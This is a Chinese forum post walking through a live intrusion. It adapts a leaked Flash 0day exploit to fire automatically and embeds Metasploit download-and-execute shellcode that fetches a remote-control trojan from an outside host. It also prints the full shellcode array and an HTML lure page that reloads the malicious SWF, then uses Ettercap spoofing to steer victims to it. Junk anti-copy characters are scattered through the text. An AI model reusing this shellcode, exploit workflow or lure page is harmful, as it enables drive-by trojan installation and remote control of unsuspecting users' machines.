找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1391|回复: 0
打印 上一主题 下一主题

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:55 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

+ F8 @ I; Q, H) n: D- I 三、flash 0day之手工代码修改制作下载者实例入侵演示 : X1 v9 G$ S4 x6 e

2 ]( y9 @4 v) t' R8 J: d

% I4 u& y7 A) T 利用到的工具: # J: ^/ f$ c8 h

% | l K' @. I4 S

/ g1 B" O: k5 p" P1 B+ Z Msf " ~- g4 V% ~# }+ t, S! i6 x$ X

9 H* A1 E- c! S

( h& R! v2 B! q1 u6 r& [ Ettercap . v; ~* b1 Z6 X! a9 k1 {' e

% {4 J! f. x5 n9 H( ]9 s

& G+ `, X7 x6 |0 J Adobe Flash CS6 Q& d5 a; X4 o0 k* l3 q2 W

! m4 q4 i( o0 K9 l2 ~1 `$ w: D

/ p; j4 R f9 [' j Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 & c4 J: M! U/ w

" v2 K/ T) }* t% A' Z, {' }- n( Y

- D+ I+ p4 s# b7 i R; N5 o 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options 0 [9 x4 \4 m: g3 z s+ o

8 S8 q9 ]3 ?$ s2 f& H# i

4 v- b( g. f$ v6 b9 K 如图: $ A9 T1 p2 ]. G6 O1 I8 T0 D

. z7 t' B2 f2 ?2 F

/ S/ A; p. ~! q* \1 O1 A) C   + L4 D6 s# J/ n1 q

8 b* ~- j. ]7 L8 y4 P3 ?/ p; y& Y

3 {' o& {# f) V: d   1 `( n2 O8 ^1 x: n( N5 a

$ K* i- }* u& Q% p( r

& _5 h" |/ K/ A, { c: c1 n 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: " ]% h' U/ A* C2 H2 \. [

" j4 Z/ g3 A: o3 c4 L$ a1 b3 b+ `

: y+ [2 s- b1 T2 g3 a   4 H% I! v. q/ H: C) ?! N

9 }( k- p* i" H8 I0 `

7 Q. e2 v6 |* V ~   9 p# u5 y( T0 P( V' u

9 x: y p5 |: K9 p1 h

9 P# ^: N4 N& u$ z+ M 然后执行generate -t dword生成shellcode,如下: ( C; Y% @6 M, _9 |# j' \; J: e

1 h# K- q$ [ D; F3 h9 |

( Z$ L# C: H( m- @   & E& A( N) x3 _9 S# i" U8 Z# m

A% ]* b' L6 g" Q" B: W5 D

; u) O# t9 {* |- L7 x( c 复制代码到文本下便于我们一会编辑flash exp,如下: ' C4 C5 O# ~. g8 j

9 _' @% V* S3 b$ |

6 f) A, ?/ k+ A+ ~3 v0 Q+ J 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, / t% V2 E2 X6 y0 I' {( E

/ Y: @( ?* _; V

$ m! n [/ \ W/ E* E 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, + Q' P; m- f) G6 k, T0 [2 A

, ~- Y I0 z/ `$ G. \

' K9 X0 f" p7 i/ h9 c' R 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, ) Q& ~2 F$ [7 |: |4 ]. W) L

2 h! m4 m& E# i1 a; R

" f% l6 }3 V* g) o 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, Z) W2 y0 J# e' M

# E% |% g2 t ?4 D! ?

0 }/ W6 d: ~( H0 F6 y4 _ 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, ; G! X; X, T/ I6 P

/ q& r k0 y, I" Z. k

2 N. o, D; P3 b3 D& p6 l 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, ?) K0 C" n! K Y" v4 X

2 r! U7 ?# ^' V' \- T$ m1 |1 @3 W

0 S7 o; _; W' D0 t6 Z 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 5 O; D0 k4 g3 Z* h b+ k* u6 |4 z7 G

; q! T: L. c9 p' c

4 d+ S% ?! d5 ^- j( O" [; u3 u3 p 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, " z" _: F2 {$ F0 A

; s/ B9 h+ E L

' }. w: _& z, k 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, / R M s8 \- n; l

0 a* x0 a3 C, S7 s. f. x) }

' ` @1 d0 |) u7 ~9 x 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, + y+ W; i) w1 f0 p% }. Z& v$ U

% g' T P. U: r( l

2 a% ?" ~: m. W6 F* s 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, $ c, C' Y- _. _( y# f

& A; E# I. y8 M" \7 A- s( a6 g

! L/ Y' g ]7 s [' h, Y [3 c" u 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, , W" O; F* z9 p2 |/ f0 H

; i6 l! @5 b. u! H0 V& G' }

4 } ]4 L' I+ o& Y6 ^2 h 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, / C4 `0 B4 l( V5 D* i8 K

/ p6 M# \( \' T- X

% `, a# a7 [! [9 V6 l 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 + t$ O# r5 K: \/ O

+ e* R: ?% |+ U9 n: E

9 v3 R* ~- \9 |1 L1 @$ P& R8 K5 ]) p9 [) N   ! F0 r4 ~5 d( o3 O: v5 r

( N' \" s0 y7 w$ \: m5 S: v

: c$ X: l8 [: I1 b% o, F9 Y8 N- k4 k5 R: F   2 K: J/ z. l# i0 t( w

2 I/ a3 P5 x4 \! M# K2 b

2 j$ M) e; B# j% [/ z5 m# @ 下面我们来修改flash 0day exp,需要修改三个文件,分别为: 4 O5 k* X; T) h+ l2 P% [! q( [

F% a% {! a& h! s1 a" z& K

; O9 F/ v3 W* a4 ~+ Q   ! x5 L8 P' e/ {: O9 t

% W7 U) @; Z& Z2 w- r0 C9 \

2 y5 O \+ K K( L6 ] 先修改ShellWin32.as,部分源代码如图: ) `" a4 R1 y n6 D, i4 J, c! i

- Z+ C7 z- K. v* p# t. V

5 p. b e* g' \   ! v6 j1 J6 j# W1 R: ^6 o! a# ?3 ^& p

3 v7 r- A C* ?! A# f1 x

8 k& M4 W5 I6 _, l8 ^' i 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: * S4 O* d+ a& a2 ]3 u" @

/ x5 `( C! C) o2 x3 k

3 N4 t6 d; `% O; X0 }$ U: n   , C! k, f7 b( Q+ r; y' m' W1 c

8 A3 p4 V- f. J5 \

2 v. I) ~: B9 z s$ { 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: * ~+ @/ P) } ~: z. f: b

$ K- J0 Y4 [2 w) e, F \

+ g. k) M! a* G4 U! V   % H6 K9 Q# S( y# z' Q

- \4 Z/ p4 l: \7 H

* \$ x. B, u* ~3 }! c; \- k 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 9 I0 W! S' u' f( D; K" a8 N8 _ V

% k1 N1 d7 G, m, M

, K, z. S9 [, K) M$ }   & |/ h" _# |- Z$ r' _! S$ |

0 c2 R- x: q3 i6 i3 J4 D0 `; A

$ r6 I) R4 `: ^3 n   . v! e8 K4 w: k# z3 i

! _( G: o- |# ?

1 o, l/ A' o' `6 I' Q. \   # G$ Q: K8 n9 F" [- |9 t

6 V" G, U: j8 a' N! W

6 G0 i: I$ A @+ g L 然后点保存,下面我们来编译一下,打开 ; G3 K% a0 x$ u1 \1 s

$ k! t7 U! }! O, g, p+ |- A5 D+ o

& |6 ]. D! `. Y, W exp1.fla然后点文件-发布,看看编译没错误 ) S, ^2 [& q F9 b

3 w9 B: F6 B, j* @ v

4 e9 N' p" k/ m5 V   % P1 |7 g9 B% H) E. L2 j- g

) m j+ B# S3 A1 l! g8 B

, B7 l5 N2 q+ T7 \7 L7 G   - Q9 [; l* X, ?1 m8 J# U, [

9 a6 j5 c. _- t+ f2 ^" m

5 U R9 _: {7 W   1 Q! ?% ?: {9 \

+ R. Y3 M3 L* `- \7 y% _2 ?' m

3 u6 N# r/ x5 _& P; v# ^/ @( v   v. P. H" ?5 G4 X t2 }- t) ^- x

* X1 Q8 ~; A+ y0 N% ?

5 j$ O5 C# h* D! a, _ 然后我们把生成的 - x$ S9 A Z6 s/ p/ C& a

: R1 V6 A) A- A2 q0 x& g

, x2 z0 N, j6 j9 \/ F4 d exp1.swf丢到kailinux /var/www/html下: 6 l7 q3 p% R" y; [% N

( O2 y; m5 F) S% W% D. ] r

4 D5 X( N/ N3 m ?% U' r ` 然后把这段代码好好编辑一下 6 g; z/ i9 H7 t0 h5 K5 [

5 N s7 D7 h* e( x* d8 T1 ?

+ P5 w% k. E2 ~, Q* r& H0 P   , b% S6 ~- k1 G; @

`+ H& R+ r4 P# c, `& |

- t( q9 ~/ D* c2 N( |   ' q3 q# \0 {( C

6 |5 [0 `! ^; P: I

c& Z8 |" v' f, `/ `3 `& a   / _9 z0 ~6 s* d) T& d

# z+ t% J3 a7 X! r1 h8 t4 U& X4 H

* F) p* I& h" a7 j N1 ]* a   ' p0 p- i; ~: S' @9 l: I

* K7 s5 Y% x2 T* q7 H% ^

- q% Q' S3 N6 m$ _" g   ' F, ?5 [* z: ?4 |

2 o4 l& }7 b% v5 F, E2 E/ o6 @

! T# B$ V4 g! \5 q0 u   ) p8 D* ?0 h7 O1 K4 p8 b& ^' v! V

* L! p6 f8 K0 Z0 a4 b

# [7 A5 E( p1 Q( u <!DOCTYPE html> 8 }2 d. S: G! c- ~4 c4 Q# W

: y* `! t, {6 H1 g

% N* Q& T* S& \, _$ ~- ? <html> $ L2 l) z/ H3 F

/ _7 f2 w% ^6 _. A, ?) N

4 |; ?3 H4 R: R# y* s3 W <head> ! _1 o) ^# r5 s, A9 g* m% |

, g& [) w; Z0 @/ n- s+ f

: ]9 b9 J2 F. c$ A <meta http-equiv="Content-Type" content="text/html; a* @( W. b4 L" t

+ p9 W7 R4 K( q! C! _

* F8 @ B- Q& O: F7 A charset=utf-8"/> : x7 _! I* r" {4 ^1 C0 u+ v

S* _* P2 `7 D7 M

: b! N" Q( w4 I7 @% X- u3 I </head> & }6 Y' L; Z9 }. ?/ g; Z4 e

; K. B) b8 ?# x) t

" `! b7 P/ r) j4 \: [$ i <body> K9 q3 x; ]% ?' l! E1 h- N h

( J) f2 m2 l, A3 O6 j, ~# U

- Q! E* a7 [' @6 S t. {/ }( ^. c1 L. z <h2> Please wait, the requested page is loading...</h2> / [1 t% I: W. A' ^# n

3 V6 ?1 L, Z2 F* d' R9 M i* Z2 h

- X% k. {/ t9 d B5 ] <br> ; f0 b; N4 B6 B* l. T

$ v& h- e1 {0 U# x+ ]8 [9 B3 v- n

T! N8 @2 h# N; h0 \ <OBJECT * K+ K/ b8 p7 e, I0 S1 X+ j( s

- h. T$ r7 r$ r, E' I' ^

* M4 N3 `2 x t) x d8 _2 ] classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie : F% a. U- d" V* j0 R

2 r+ D7 |( z$ {

. i9 R1 X4 g9 g( Y* l- L; o5 k VALUE="http://192.168.0.109/exp1.swf"></OBJECT> ' L ]! W9 `- P$ {! y% D

4 K& b# J! w. a1 \% N/ |7 \

* G2 K! G4 e& @/ Q </body> . g. j3 p4 g9 I) X$ C

: D4 G; I& V( c: Z7 m1 ^

* K. ?4 X x2 [! P# X <script> 3 N/ `* ~8 B: H) U8 y

! {" d. m$ o# J4 ~7 B. [

$ j6 Y, d0 P+ y     setTimeout(function () { 3 ?2 e; W8 p( R4 l; Y( Q# K

8 x' X! L1 |9 A9 ~4 T

( w5 C2 y ]5 R          8 s$ T3 E w- i; l

& s( U6 B5 T- a0 f

& ]; m+ O0 F( K window.location.reload(); / N( a# K/ \# L% U! b' Q

# b, V+ h% ?! b- a

- R' j- a5 c. p" L+ x5 Y     }, 10000); 3 `7 Z I$ j9 O0 U5 ~

4 v( w4 @, f8 n

0 Z0 A# Y! U6 e$ |( }* N5 q' P ~   3 l- }+ r+ m' f7 e* K

- @& ~* y5 X, r

5 Y' l# l& E. C( P& R* Q </script> # i6 {1 X4 U6 f- o

) i- ^- A. x6 y

0 ]3 Z: l( D$ \+ E$ j! n4 G7 L. @ O </html> : k9 C4 H+ x4 S# i% [; c$ J

& D+ [# p& `% @# \

$ n2 I6 Z& w4 z' x0 t   5 H# u2 F( @8 h8 O( Z: C

+ I! Q* t6 [$ J) w7 V

5 g* r& a( U( P4 W4 f, e 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: 1 V* e+ {7 f; K: ^; |4 y( c6 C2 P

3 h# I# L8 _+ F" ^# `5 r9 M( H

: u0 a( G z1 y- s0 n; j; }   & D1 W& I |4 O! {, S6 A; k9 y

* y4 z) d$ Z6 v2 W

, w! h1 v9 @0 u6 M- e6 N) o   0 F6 J/ M5 T4 v0 Q" j5 j

) r" [" q3 ^5 X, r e4 Q

* P" a7 @1 x2 J4 r0 Q   ! h0 ]* r7 J1 {$ R. r: j

# B( G* }8 l$ Y) U' D0 m4 C

- X& S) R+ I0 C9 W* s   8 \0 d6 n) ~0 U e* q1 u

2 P6 c1 B/ t, F0 ^5 [$ [

$ w. {0 n# X6 g Q& b- q2 R   1 Z# i8 c! y+ n% ^6 m& z: T

}" o+ V4 `8 z$ W s

* R, S( U" R' B2 c 下面我们用ettercap欺骗如图: 6 T l( a" x9 T7 \# l; C& ~+ f

5 Q: _5 b) V% |# n3 R- a, S. l

. g: q' |) U8 z/ G) T! m   3 t4 l. N+ G+ F$ m

) Y! X$ o3 j/ a4 o. f2 L) g, D8 N

1 C% k: L$ _% }& M. ]& ~" S) P+ F ^   # O! Y0 p- m1 R% s

; e* ^, Q$ m m" m

% A7 g' T G1 o! H& F) L; { 下面我们随便访问个网站看看: + s9 I! e( w) [9 z2 Q

5 {% y' k# E8 w7 q

2 D. t& Z; K4 S/ N. A4 Z, |4 h 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: & C9 S2 V- k4 {* R4 u1 T

8 U: c. \( k5 z7 q. q

. R W2 V) w* U' `6 ~- U   5 q+ @+ A2 X. S2 {1 E2 G" J! v

3 a2 a) D1 Z6 b1 b& U" g G" L

4 W" p0 x, _% h 我们看另一台, 3 O2 }& P6 W/ E/ Z% m+ E8 x0 Y

- ~+ d; A2 b2 ^! D) C

4 e% \$ a! g4 j2 \. |9 T& i 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 , @; K: D" p" N' O8 s! |8 X

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表